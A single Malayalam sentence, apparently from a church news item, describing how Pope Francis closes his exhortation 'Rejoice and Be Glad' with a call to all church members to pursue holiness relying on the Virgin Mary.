പുണ്യത്തിന്റെ വഴി നമ്മെ പഠിപ്പിച്ച, സുവിശേഷഭാഗ്യങ്ങൾ സ്വന്തം ജീവിതമാക്കിയ, കർത്താവിന്റെ സന്നിധാനത്തിൽ മനസ് നിറയെ സന്തോഷം അനുഭവിച്ച പരിശുദ്ധ മറിയത്തിലാശ്രയിച്ച് വിശുദ്ധിയുടെ പടവുകൾ കയറാൻ എല്ലാ സഭാംഗങ്ങളെയും ആഹ്വാനം ചെയ്തുകൊണ്ടാണ് ഫ്രാൻസിസ് മാർപാപ്പ “ആനന്ദിച്ച് ആഹ്ലാദിക്കുവിൻ’ എന്ന പ്രബോധനരേഖ സമാപിപ്പിക്കുന്നത്.